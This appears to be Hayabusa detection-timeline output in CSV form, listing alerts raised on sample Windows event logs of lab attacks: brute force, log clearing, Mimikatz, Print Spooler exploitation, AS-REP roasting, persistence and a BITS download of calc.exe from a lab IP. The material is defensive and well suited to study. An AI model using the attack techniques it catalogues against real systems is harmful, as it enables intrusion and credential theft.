admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx +2021-05-20 21:49:46.875 +09:00,fs01.offsec.lan,4648,informational,Explicit Logon,Source User: FS01$ : Target User: sshd_5848 : IP Address: - : Process: C:\Program Files\OpenSSH-Win64\sshd.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx +2021-05-20 21:49:46.876 +09:00,fs01.offsec.lan,4624,low,Logon Type 5 - Service,User: sshd_5848 : Workstation: - : IP Address: - : Port: - : LogonID: 0x3c569ed,rules/hayabusa/default/events/Security/Logons/4624_LogonType-5-Service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx +2021-05-20 21:49:46.876 +09:00,fs01.offsec.lan,4672,informational,Admin Logon,User: sshd_5848 : LogonID: 0x3c569ed,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx +2021-05-20 21:49:52.315 +09:00,fs01.offsec.lan,4776,informational,NTLM Logon to Local Account,User: NOUSER : Workstation FS01 : Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx +2021-05-20 21:49:52.315 +09:00,fs01.offsec.lan,4625,informational,Logon Failure - Username does not exist,User: NOUSER : Type: 8 : Workstation: FS01 : IP Address: - : SubStatus: 0xc0000064 : AuthPackage: 
Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx +2021-05-20 21:49:52.315 +09:00,-,-,medium,User Guessing Attempt,[condition] count() by IpAddress >= 5 in timeframe [result] count:5 IpAddress:- timeframe:5m,rules/hayabusa/default/alerts/Security/4625_BruteForce_UserGuessingDetect.yml,- +2021-05-20 21:49:53.378 +09:00,fs01.offsec.lan,4776,informational,NTLM Logon to Local Account,User: NOUSER : Workstation FS01 : Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx +2021-05-20 21:49:53.378 +09:00,fs01.offsec.lan,4625,informational,Logon Failure - Username does not exist,User: NOUSER : Type: 8 : Workstation: FS01 : IP Address: - : SubStatus: 0xc0000064 : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx +2021-05-20 21:49:54.043 +09:00,fs01.offsec.lan,4776,informational,NTLM Logon to Local Account,User: NOUSER : Workstation FS01 : Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx +2021-05-20 21:49:54.043 +09:00,fs01.offsec.lan,4625,informational,Logon Failure - Username does not exist,User: NOUSER : Type: 8 : Workstation: FS01 : IP Address: - : SubStatus: 0xc0000064 : AuthPackage: 
Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx +2021-05-20 21:49:54.662 +09:00,fs01.offsec.lan,4776,informational,NTLM Logon to Local Account,User: NOUSER : Workstation FS01 : Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx +2021-05-20 21:49:54.662 +09:00,fs01.offsec.lan,4625,informational,Logon Failure - Username does not exist,User: NOUSER : Type: 8 : Workstation: FS01 : IP Address: - : SubStatus: 0xc0000064 : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx +2021-05-20 21:49:54.945 +09:00,fs01.offsec.lan,4776,informational,NTLM Logon to Local Account,User: NOUSER : Workstation FS01 : Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx +2021-05-20 21:49:54.945 +09:00,fs01.offsec.lan,4625,informational,Logon Failure - Username does not exist,User: NOUSER : Type: 8 : Workstation: FS01 : IP Address: - : SubStatus: 0xc0000064 : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx +2021-05-22 05:43:07.153 +09:00,fs01.offsec.lan,4648,informational,Explicit Logon,Source User: FS01$ : Target 
User: sshd_4332 : IP Address: - : Process: C:\Program Files\OpenSSH-Win64\sshd.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx +2021-05-22 05:43:07.153 +09:00,fs01.offsec.lan,4624,low,Logon Type 5 - Service,User: sshd_4332 : Workstation: - : IP Address: - : Port: - : LogonID: 0x47a203c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-5-Service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx +2021-05-22 05:43:18.227 +09:00,fs01.offsec.lan,4648,informational,Explicit Logon,Source User: FS01$ : Target User: admmig : IP Address: - : Process: C:\Program Files\OpenSSH-Win64\sshd.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx +2021-05-22 05:43:22.562 +09:00,fs01.offsec.lan,4625,low,Logon Failure - Wrong Password,User: admmig@offsec.lan : Type: 8 : Workstation: FS01 : IP Address: - : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx +2021-05-22 05:43:22.562 +09:00,-,-,medium,Password Guessing Attack,[condition] count() by IpAddress >= 5 in timeframe [result] count:5 IpAddress:- timeframe:5m,rules/hayabusa/default/alerts/Security/4625_BruteForce_PasswordGuessingDetect.yml,- +2021-05-22 05:43:49.345 +09:00,fs01.offsec.lan,4625,low,Logon Failure - Wrong Password,User: admmig@offsec.lan : Type: 8 : Workstation: FS01 : IP Address: - : AuthPackage: 
Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx +2021-05-22 05:43:50.131 +09:00,fs01.offsec.lan,4625,low,Logon Failure - Wrong Password,User: admmig@offsec.lan : Type: 8 : Workstation: FS01 : IP Address: - : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx +2021-05-22 05:43:50.607 +09:00,fs01.offsec.lan,4625,low,Logon Failure - Wrong Password,User: admmig@offsec.lan : Type: 8 : Workstation: FS01 : IP Address: - : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx +2021-05-22 05:43:50.866 +09:00,fs01.offsec.lan,4625,low,Logon Failure - Wrong Password,User: admmig@offsec.lan : Type: 8 : Workstation: FS01 : IP Address: - : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx +2021-05-23 06:56:57.685 +09:00,fs01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID4688-netsh helper DLL.evtx +2021-05-23 06:57:11.842 +09:00,fs01.offsec.lan,4688,high,Relevant Anti-Virus 
Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID4688-netsh helper DLL.evtx +2021-05-23 06:57:11.842 +09:00,fs01.offsec.lan,4688,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID4688-netsh helper DLL.evtx +2021-05-26 22:02:27.149 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 47156 : LogonID: 0x312517c1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 22:02:27.155 +09:00,mssql01.offsec.lan,5145,critical,CVE-2021-1675 Print Spooler Exploitation IPC Access,,rules/sigma/builtin/security/win_exploit_cve_2021_1675_printspooler_security.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 22:02:27.155 +09:00,mssql01.offsec.lan,5145,medium,DCERPC SMB Spoolss Named Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 22:02:29.726 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 47160 : LogonID: 0x31251a6a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 22:02:29.734 +09:00,mssql01.offsec.lan,5145,critical,CVE-2021-1675 Print Spooler Exploitation IPC 
Access,,rules/sigma/builtin/security/win_exploit_cve_2021_1675_printspooler_security.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 22:02:29.734 +09:00,mssql01.offsec.lan,5145,medium,DCERPC SMB Spoolss Named Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 22:02:34.373 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 65333 : LogonID: 0x31251ce4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 22:02:34.375 +09:00,mssql01.offsec.lan,5145,medium,DCERPC SMB Spoolss Named Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 22:02:34.379 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 65335 : LogonID: 0x31251d11,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 22:02:34.379 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 65336 : LogonID: 0x31251d23,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 22:02:34.380 
+09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 65337 : LogonID: 0x31251d36,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-27 05:24:46.570 +09:00,rootdc1.offsec.lan,4768,medium,Possible AS-REP Roasting,Possible AS-REP Roasting,rules/hayabusa/default/alerts/Security/4768_StealOrForgeKerberosTickets_AS-REP-Roasting.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4768-Kerberos AS-REP Roasting.evtx +2021-05-27 05:24:46.570 +09:00,rootdc1.offsec.lan,4768,informational,Kerberos TGT was requested,User: admin-test : Service: krbtgt : IP Address: ::ffff:10.23.23.9 : Status: 0x0 : PreAuthType: 0,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4768-Kerberos AS-REP Roasting.evtx +2021-06-01 23:06:34.542 +09:00,fs01.offsec.lan,4720,medium,Local user account created,User: WADGUtilityAccount : SID:S-1-5-21-1081258321-37805170-3511562335-1000,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4720,4698-Fortinet APT group abuse on Windows.evtx" +2021-06-01 23:08:21.225 +09:00,fs01.offsec.lan,4720,medium,Local user account created,User: elie : SID:S-1-5-21-1081258321-37805170-3511562335-1001,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4720,4698-Fortinet APT group abuse on Windows.evtx" +2021-06-01 23:09:38.437 +09:00,-,-,low,Rare Schtasks Creations,[condition] count() by TaskName < 5 in timeframe 
[result] count:1 TaskName:\\Microsoft\\SynchronizeTimeZone timeframe:7d,rules/sigma/builtin/security/win_rare_schtasks_creations.yml,- +2021-06-03 21:17:56.988 +09:00,fs01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1090-Proxy/ID4688-netsh port forwarding abuse.evtx +2021-06-03 21:18:12.941 +09:00,fs01.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x322e5b7,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1090-Proxy/ID4688-netsh port forwarding abuse.evtx +2021-06-03 21:18:12.942 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 56061 : LogonID: 0x322e5b7,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1090-Proxy/ID4688-netsh port forwarding abuse.evtx +2021-06-04 03:34:12.672 +09:00,fs01.offsec.lan,4104,high,Windows Firewall Profile Disabled,,rules/sigma/powershell/powershell_script/powershell_windows_firewall_profile_disabled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID800-4103-Firewall disabled.evtx +2021-06-04 04:17:44.873 +09:00,fs01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4688-5447-4950-Firewall disabled (command).evtx +2021-06-04 04:39:52.893 +09:00,fs01.offsec.lan,2003,low,USB Device 
Plugged,,rules/sigma/other/driverframeworks/win_usb_device_plugged.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2003-4950-Firewall disabled.evtx +2021-06-04 04:39:52.895 +09:00,fs01.offsec.lan,2003,low,USB Device Plugged,,rules/sigma/other/driverframeworks/win_usb_device_plugged.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2003-4950-Firewall disabled.evtx +2021-06-04 04:39:53.056 +09:00,fs01.offsec.lan,2003,low,USB Device Plugged,,rules/sigma/other/driverframeworks/win_usb_device_plugged.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2003-4950-Firewall disabled.evtx +2021-06-04 17:41:47.982 +09:00,exchange01.offsec.lan,6,high,Failed MSExchange Transport Agent Installation,,rules/sigma/other/msexchange/win_exchange_transportagent_failed.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505-Server Software Component/ID6-Failed to install an Exchange transport agent.evtx +2021-06-04 17:41:48.041 +09:00,exchange01.offsec.lan,6,high,Failed MSExchange Transport Agent Installation,,rules/sigma/other/msexchange/win_exchange_transportagent_failed.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505-Server Software Component/ID6-Failed to install an Exchange transport agent.evtx +2021-06-10 04:29:58.239 +09:00,fs01.offsec.lan,20,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID19-20-WMI registration via PowerLurk.evtx +2021-06-10 04:29:58.240 +09:00,fs01.offsec.lan,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered 
Execution/ID19-20-WMI registration via PowerLurk.evtx +2021-06-10 04:29:58.392 +09:00,fs01.offsec.lan,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID19-20-WMI registration via PowerLurk.evtx +2021-06-11 06:21:20.636 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 51503 : LogonID: 0x5a4175e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-11 06:21:26.357 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 56594 : LogonID: 0x5a41984,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-11 06:21:26.383 +09:00,-,-,low,Rare Schtasks Creations,[condition] count() by TaskName < 5 in timeframe [result] count:2 TaskName:\\bouWFQYO timeframe:7d,rules/sigma/builtin/security/win_rare_schtasks_creations.yml,- +2021-06-11 06:21:26.406 +09:00,fs01.offsec.lan,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4698-4699-Fast created & deleted task by ATexec (susp. 
arg.).evtx +2021-06-11 06:21:26.406 +09:00,fs01.offsec.lan,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-11 06:21:26.415 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\bouWFQYO.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID5145-Remote schedule task creation (ATexec).evtx +2021-06-11 06:21:26.415 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\bouWFQYO.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-11 06:21:29.427 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\bouWFQYO.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID5145-Remote schedule task creation (ATexec).evtx +2021-06-11 06:21:29.427 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\bouWFQYO.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask 
creation (GLOBAL).evtx" +2021-06-11 06:21:29.441 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\bouWFQYO.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID5145-Remote schedule task creation (ATexec).evtx +2021-06-11 06:21:29.441 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\bouWFQYO.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-13 15:17:18.087 +09:00,sv-dc.hinokabegakure-no-sato.local,59,informational,Bits Job Creation,Job Title: test : URL: http://192.168.10.254:80/calc.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/YamatoSecurity/T1197_BITS Jobs/Windows-BitsClient.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 
+09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential 
